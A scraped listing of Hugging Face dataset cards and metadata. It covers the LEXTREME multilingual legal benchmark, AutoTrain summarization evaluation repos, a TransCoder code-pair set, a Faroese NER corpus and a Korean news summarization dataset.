The following languages are supported: bg , cs , da, de, el, en, es, et, fi, fr, ga, hr, hu, it, lt, lv, mt, nl, pl, pt, ro, sk, sl, sv
## Dataset Structure
### Data Instances
The file format is jsonl and three data splits are present for each configuration (train, validation and test).
### Data Fields
[More Information Needed]
### Data Splits
[More Information Needed]
## Dataset Creation
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
[More Information Needed]
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
[More Information Needed]
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
How can I contribute a dataset to lextreme?
Please follow the following steps:
1. Make sure your dataset is available on the huggingface hub and has a train, validation and test split.
2. Create a pull request to the lextreme repository by adding the following to the lextreme.py file:
- Create a dict _{YOUR_DATASET_NAME} (similar to _BRAZILIAN_COURT_DECISIONS_JUDGMENT) containing all the necessary information about your dataset (task_type, input_col, label_col, etc.)
- Add your dataset to the BUILDER_CONFIGS list: `LextremeConfig(name="{your_dataset_name}", **_{YOUR_DATASET_NAME})`
- Test that it works correctly by loading your subset with `load_dataset("lextreme", "{your_dataset_name}")` and inspecting a few examples.
### Dataset Curators
[More Information Needed]
### Licensing Information
[More Information Needed]
### Citation Information
```
@misc{niklaus2023lextreme,
title={LEXTREME: A Multi-Lingual and Multi-Task Benchmark for the Legal Domain},
author={Joel Niklaus and Veton Matoshi and Pooja Rani and Andrea Galassi and Matthias Stürmer and Ilias Chalkidis},
year={2023},
eprint={2301.13126},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
### Contributions
Thanks to [@JoelNiklaus](https://github.com/joelniklaus) for adding this dataset.
| joelniklaus/lextreme | [
"task_categories:text-classification",
"task_categories:token-classification",
"task_ids:multi-class-classification",
"task_ids:multi-label-classification",
"task_ids:topic-classification",
"task_ids:named-entity-recognition",
"annotations_creators:other",
"language_creators:found",
"multilinguality:multilingual",
"size_categories:10K<n<100K",
"source_datasets:extended",
"language:bg",
"language:cs",
"language:da",
"language:de",
"language:el",
"language:en",
"language:es",
"language:et",
"language:fi",
"language:fr",
"language:ga",
"language:hr",
"language:hu",
"language:it",
"language:lt",
"language:lv",
"language:mt",
"language:nl",
"language:pl",
"language:pt",
"language:ro",
"language:sk",
"language:sl",
"language:sv",
"license:cc-by-4.0",
"arxiv:2301.13126",
"region:us"
] | 2022-08-01T07:41:55+00:00 | {"annotations_creators": ["other"], "language_creators": ["found"], "language": ["bg", "cs", "da", "de", "el", "en", "es", "et", "fi", "fr", "ga", "hr", "hu", "it", "lt", "lv", "mt", "nl", "pl", "pt", "ro", "sk", "sl", "sv"], "license": ["cc-by-4.0"], "multilinguality": ["multilingual"], "size_categories": ["10K<n<100K"], "source_datasets": ["extended"], "task_categories": ["text-classification", "token-classification"], "task_ids": ["multi-class-classification", "multi-label-classification", "topic-classification", "named-entity-recognition"], "pretty_name": "LEXTREME: A Multilingual Legal Benchmark for Natural Language Understanding"} | 2023-04-29T06:02:17+00:00 | [
"2301.13126"
] | [
"bg",
"cs",
"da",
"de",
"el",
"en",
"es",
"et",
"fi",
"fr",
"ga",
"hr",
"hu",
"it",
"lt",
"lv",
"mt",
"nl",
"pl",
"pt",
"ro",
"sk",
"sl",
"sv"
] | TAGS
#task_categories-text-classification #task_categories-token-classification #task_ids-multi-class-classification #task_ids-multi-label-classification #task_ids-topic-classification #task_ids-named-entity-recognition #annotations_creators-other #language_creators-found #multilinguality-multilingual #size_categories-10K<n<100K #source_datasets-extended #language-Bulgarian #language-Czech #language-Danish #language-German #language-Modern Greek (1453-) #language-English #language-Spanish #language-Estonian #language-Finnish #language-French #language-Irish #language-Croatian #language-Hungarian #language-Italian #language-Lithuanian #language-Latvian #language-Maltese #language-Dutch #language-Polish #language-Portuguese #language-Romanian #language-Slovak #language-Slovenian #language-Swedish #license-cc-by-4.0 #arxiv-2301.13126 #region-us
| Dataset Card for LEXTREME: A Multilingual Legal Benchmark for Natural Language Understanding
============================================================================================
Table of Contents
-----------------
* Table of Contents
* Dataset Description
+ Dataset Summary
+ Supported Tasks and Leaderboards
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
+ Personal and Sensitive Information
* Considerations for Using the Data
+ Social Impact of Dataset
+ Discussion of Biases
+ Other Known Limitations
* Additional Information
+ Dataset Curators
+ Licensing Information
+ Citation Information
+ Contributions
Dataset Description
-------------------
* Homepage:
* Repository:
* Paper:
* Leaderboard:
* Point of Contact: Joel Niklaus
### Dataset Summary
The dataset consists of 11 diverse multilingual legal NLU datasets. 6 datasets have one single configuration and 5 datasets have two or three configurations. This leads to a total of 18 tasks (8 single-label text classification tasks, 5 multi-label text classification tasks and 5 token-classification tasks).
Use the dataset like this:
### Supported Tasks and Leaderboards
The dataset supports the tasks of text classification and token classification.
In detail, we support the folliwing tasks and configurations:
### Languages
The following languages are supported: bg , cs , da, de, el, en, es, et, fi, fr, ga, hr, hu, it, lt, lv, mt, nl, pl, pt, ro, sk, sl, sv
Dataset Structure
-----------------
### Data Instances
The file format is jsonl and three data splits are present for each configuration (train, validation and test).
### Data Fields
### Data Splits
Dataset Creation
----------------
### Curation Rationale
### Source Data
#### Initial Data Collection and Normalization
#### Who are the source language producers?
### Annotations
#### Annotation process
#### Who are the annotators?
### Personal and Sensitive Information
Considerations for Using the Data
---------------------------------
### Social Impact of Dataset
### Discussion of Biases
### Other Known Limitations
Additional Information
----------------------
How can I contribute a dataset to lextreme?
Please follow the following steps:
1. Make sure your dataset is available on the huggingface hub and has a train, validation and test split.
2. Create a pull request to the lextreme repository by adding the following to the URL file:
* Create a dict \_{YOUR\_DATASET\_NAME} (similar to \_BRAZILIAN\_COURT\_DECISIONS\_JUDGMENT) containing all the necessary information about your dataset (task\_type, input\_col, label\_col, etc.)
* Add your dataset to the BUILDER\_CONFIGS list: 'LextremeConfig(name="{your\_dataset\_name}", \_{YOUR\_DATASET\_NAME})'
* Test that it works correctly by loading your subset with 'load\_dataset("lextreme", "{your\_dataset\_name}")' and inspecting a few examples.
### Dataset Curators
### Licensing Information
### Contributions
Thanks to @JoelNiklaus for adding this dataset.
| [
"### Dataset Summary\n\n\nThe dataset consists of 11 diverse multilingual legal NLU datasets. 6 datasets have one single configuration and 5 datasets have two or three configurations. This leads to a total of 18 tasks (8 single-label text classification tasks, 5 multi-label text classification tasks and 5 token-classification tasks).\n\n\nUse the dataset like this:",
"### Supported Tasks and Leaderboards\n\n\nThe dataset supports the tasks of text classification and token classification.\nIn detail, we support the folliwing tasks and configurations:",
"### Languages\n\n\nThe following languages are supported: bg , cs , da, de, el, en, es, et, fi, fr, ga, hr, hu, it, lt, lv, mt, nl, pl, pt, ro, sk, sl, sv\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nThe file format is jsonl and three data splits are present for each configuration (train, validation and test).",
"### Data Fields",
"### Data Splits\n\n\nDataset Creation\n----------------",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------\n\n\nHow can I contribute a dataset to lextreme?\nPlease follow the following steps:\n\n\n1. Make sure your dataset is available on the huggingface hub and has a train, validation and test split.\n2. Create a pull request to the lextreme repository by adding the following to the URL file:\n\t* Create a dict \\_{YOUR\\_DATASET\\_NAME} (similar to \\_BRAZILIAN\\_COURT\\_DECISIONS\\_JUDGMENT) containing all the necessary information about your dataset (task\\_type, input\\_col, label\\_col, etc.)\n\t* Add your dataset to the BUILDER\\_CONFIGS list: 'LextremeConfig(name=\"{your\\_dataset\\_name}\", \\_{YOUR\\_DATASET\\_NAME})'\n\t* Test that it works correctly by loading your subset with 'load\\_dataset(\"lextreme\", \"{your\\_dataset\\_name}\")' and inspecting a few examples.",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\n\nThanks to @JoelNiklaus for adding this dataset."
] | [
"TAGS\n#task_categories-text-classification #task_categories-token-classification #task_ids-multi-class-classification #task_ids-multi-label-classification #task_ids-topic-classification #task_ids-named-entity-recognition #annotations_creators-other #language_creators-found #multilinguality-multilingual #size_categories-10K<n<100K #source_datasets-extended #language-Bulgarian #language-Czech #language-Danish #language-German #language-Modern Greek (1453-) #language-English #language-Spanish #language-Estonian #language-Finnish #language-French #language-Irish #language-Croatian #language-Hungarian #language-Italian #language-Lithuanian #language-Latvian #language-Maltese #language-Dutch #language-Polish #language-Portuguese #language-Romanian #language-Slovak #language-Slovenian #language-Swedish #license-cc-by-4.0 #arxiv-2301.13126 #region-us \n",
"### Dataset Summary\n\n\nThe dataset consists of 11 diverse multilingual legal NLU datasets. 6 datasets have one single configuration and 5 datasets have two or three configurations. This leads to a total of 18 tasks (8 single-label text classification tasks, 5 multi-label text classification tasks and 5 token-classification tasks).\n\n\nUse the dataset like this:",
"### Supported Tasks and Leaderboards\n\n\nThe dataset supports the tasks of text classification and token classification.\nIn detail, we support the folliwing tasks and configurations:",
"### Languages\n\n\nThe following languages are supported: bg , cs , da, de, el, en, es, et, fi, fr, ga, hr, hu, it, lt, lv, mt, nl, pl, pt, ro, sk, sl, sv\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nThe file format is jsonl and three data splits are present for each configuration (train, validation and test).",
"### Data Fields",
"### Data Splits\n\n\nDataset Creation\n----------------",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------\n\n\nHow can I contribute a dataset to lextreme?\nPlease follow the following steps:\n\n\n1. Make sure your dataset is available on the huggingface hub and has a train, validation and test split.\n2. Create a pull request to the lextreme repository by adding the following to the URL file:\n\t* Create a dict \\_{YOUR\\_DATASET\\_NAME} (similar to \\_BRAZILIAN\\_COURT\\_DECISIONS\\_JUDGMENT) containing all the necessary information about your dataset (task\\_type, input\\_col, label\\_col, etc.)\n\t* Add your dataset to the BUILDER\\_CONFIGS list: 'LextremeConfig(name=\"{your\\_dataset\\_name}\", \\_{YOUR\\_DATASET\\_NAME})'\n\t* Test that it works correctly by loading your subset with 'load\\_dataset(\"lextreme\", \"{your\\_dataset\\_name}\")' and inspecting a few examples.",
"### Dataset Curators",
"### Licensing Information",
"### Contributions\n\n\nThanks to @JoelNiklaus for adding this dataset."
] |
6ce1c304556d5f62c1c7ad2378ec3dcbebdd4474 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: samsum
* Config: samsum
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-samsum-db063b78-12135617 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-08-01T08:22:11+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["samsum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2", "metrics": [], "dataset_name": "samsum", "dataset_config": "samsum", "dataset_split": "test", "col_mapping": {"text": "dialogue", "target": "summary"}}} | 2022-08-01T08:28:59+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: samsum
* Config: samsum
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: samsum\n* Config: samsum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: samsum\n* Config: samsum\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
32fba0b0ee59bc29ea13ff25f7029ca19b48f410 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: xsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-xsum-4118bb33-12145618 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-08-01T08:26:45+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["xsum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2", "metrics": [], "dataset_name": "xsum", "dataset_config": "default", "dataset_split": "test", "col_mapping": {"text": "document", "target": "summary"}}} | 2022-08-01T12:41:09+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: xsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: xsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: xsum\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
6e28526de611e2cce102546dc19ee2aa5c4d9606 |
# statistics
cpp-java: 627 pairs
python-java: 616 pairs
cpp-python: 545 pairs
| ziwenyd/transcoder-geeksforgeeks | [
"license:mit",
"region:us"
] | 2022-08-01T08:28:39+00:00 | {"license": "mit"} | 2022-08-03T13:59:08+00:00 | [] | [] | TAGS
#license-mit #region-us
|
# statistics
cpp-java: 627 pairs
python-java: 616 pairs
cpp-python: 545 pairs
| [
"# statistics\n\ncpp-java: 627 pairs\n\npython-java: 616 pairs\n\ncpp-python: 545 pairs"
] | [
"TAGS\n#license-mit #region-us \n",
"# statistics\n\ncpp-java: 627 pairs\n\npython-java: 616 pairs\n\ncpp-python: 545 pairs"
] |
b48f43ffb8808a1d3797ad2f9c112fc743fc37a9 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-cnn_dailymail-b454c496-12155619 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-08-01T08:30:58+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["cnn_dailymail"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2", "metrics": [], "dataset_name": "cnn_dailymail", "dataset_config": "3.0.0", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-08-01T14:27:24+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2
* Dataset: cnn_dailymail
* Config: 3.0.0
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @pszemraj for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: pszemraj/long-t5-tglobal-base-16384-booksum-V11-big_patent-V2\n* Dataset: cnn_dailymail\n* Config: 3.0.0\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @pszemraj for evaluating this model."
] |
ddb7e90cba94406060a1ecf502017d244b5b14c2 |
This is a Faroese NER corpus, FoNE, it was created by annotating the [Sosialurin corpus](https://huggingface.co/datasets/vesteinn/sosialurin-faroese-pos).
If you find this dataset useful, please cite
```
@inproceedings{snaebjarnarson-etal-2023-transfer,
title = "{T}ransfer to a Low-Resource Language via Close Relatives: The Case Study on Faroese",
author = "Snæbjarnarson, Vésteinn and
Simonsen, Annika and
Glavaš, Goran and
Vulić, Ivan",
booktitle = "Proceedings of the 24th Nordic Conference on Computational Linguistics (NoDaLiDa)",
month = "may 22--24",
year = "2023",
address = "Tórshavn, Faroe Islands",
publisher = {Link{\"o}ping University Electronic Press, Sweden},
}
``` | vesteinn/sosialurin-faroese-ner | [
"task_categories:token-classification",
"task_ids:named-entity-recognition",
"size_categories:1K<n<10K",
"language:fo",
"license:cc-by-4.0",
"region:us"
] | 2022-08-01T11:33:34+00:00 | {"language": ["fo"], "license": "cc-by-4.0", "size_categories": ["1K<n<10K"], "task_categories": ["token-classification"], "task_ids": ["named-entity-recognition"], "pretty_name": "FoNE"} | 2024-01-05T12:44:42+00:00 | [] | [
"fo"
] | TAGS
#task_categories-token-classification #task_ids-named-entity-recognition #size_categories-1K<n<10K #language-Faroese #license-cc-by-4.0 #region-us
|
This is a Faroese NER corpus, FoNE, it was created by annotating the Sosialurin corpus.
If you find this dataset useful, please cite
| [] | [
"TAGS\n#task_categories-token-classification #task_ids-named-entity-recognition #size_categories-1K<n<10K #language-Faroese #license-cc-by-4.0 #region-us \n"
] |
cd0823496bbf167f176f6239a9ee8c0985247853 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: yhavinga/t5-v1.1-base-dutch-cnn-test
* Dataset: ml6team/cnn_dailymail_nl
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@yhavinga](https://huggingface.co/yhavinga) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-ml6team__cnn_dailymail_nl-a771a5f9-12165620 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-08-01T11:37:49+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["ml6team/cnn_dailymail_nl"], "eval_info": {"task": "summarization", "model": "yhavinga/t5-v1.1-base-dutch-cnn-test", "metrics": [], "dataset_name": "ml6team/cnn_dailymail_nl", "dataset_config": "default", "dataset_split": "test", "col_mapping": {"text": "article", "target": "highlights"}}} | 2022-08-01T12:47:31+00:00 | [] | [] | TAGS
#autotrain #evaluation #region-us
| # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by AutoTrain for the following task and dataset:
* Task: Summarization
* Model: yhavinga/t5-v1.1-base-dutch-cnn-test
* Dataset: ml6team/cnn_dailymail_nl
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's automatic model evaluator.
## Contributions
Thanks to @yhavinga for evaluating this model. | [
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: yhavinga/t5-v1.1-base-dutch-cnn-test\n* Dataset: ml6team/cnn_dailymail_nl\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @yhavinga for evaluating this model."
] | [
"TAGS\n#autotrain #evaluation #region-us \n",
"# Dataset Card for AutoTrain Evaluator\n\nThis repository contains model predictions generated by AutoTrain for the following task and dataset:\n\n* Task: Summarization\n* Model: yhavinga/t5-v1.1-base-dutch-cnn-test\n* Dataset: ml6team/cnn_dailymail_nl\n* Config: default\n* Split: test\n\nTo run new evaluation jobs, visit Hugging Face's automatic model evaluator.",
"## Contributions\n\nThanks to @yhavinga for evaluating this model."
] |
fa6ec90a7beb96d182372f09b04b96797ea6588a | This dataset is a custom dataset created by the author by crawling Naver News (https://news.naver.com) for the Korean NLP model hands-on.
- Period: July 1, 2022 - July 10, 2022
- Subject: IT, economics
```
DatasetDict({
train: Dataset({
features: ['date', 'category', 'press', 'title', 'document', 'link', 'summary'],
num_rows: 22194
})
test: Dataset({
features: ['date', 'category', 'press', 'title', 'document', 'link', 'summary'],
num_rows: 2740
})
validation: Dataset({
features: ['date', 'category', 'press', 'title', 'document', 'link', 'summary'],
num_rows: 2466
})
})
```
---
license: apache-2.0
--- | daekeun-ml/naver-news-summarization-ko | [
"task_categories:summarization",
"size_categories:10K<n<100K",
"language:ko",
"license:apache-2.0",
"region:us"
] | 2022-08-01T13:54:17+00:00 | {"language": ["ko"], "license": "apache-2.0", "size_categories": ["10K<n<100K"], "task_categories": ["summarization"]} | 2023-01-10T11:12:44+00:00 | [] | [
"ko"
] | TAGS
#task_categories-summarization #size_categories-10K<n<100K #language-Korean #license-apache-2.0 #region-us
| This dataset is a custom dataset created by the author by crawling Naver News (URL) for the Korean NLP model hands-on.
- Period: July 1, 2022 - July 10, 2022
- Subject: IT, economics
---
license: apache-2.0
--- | [] | [
"TAGS\n#task_categories-summarization #size_categories-10K<n<100K #language-Korean #license-apache-2.0 #region-us \n"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.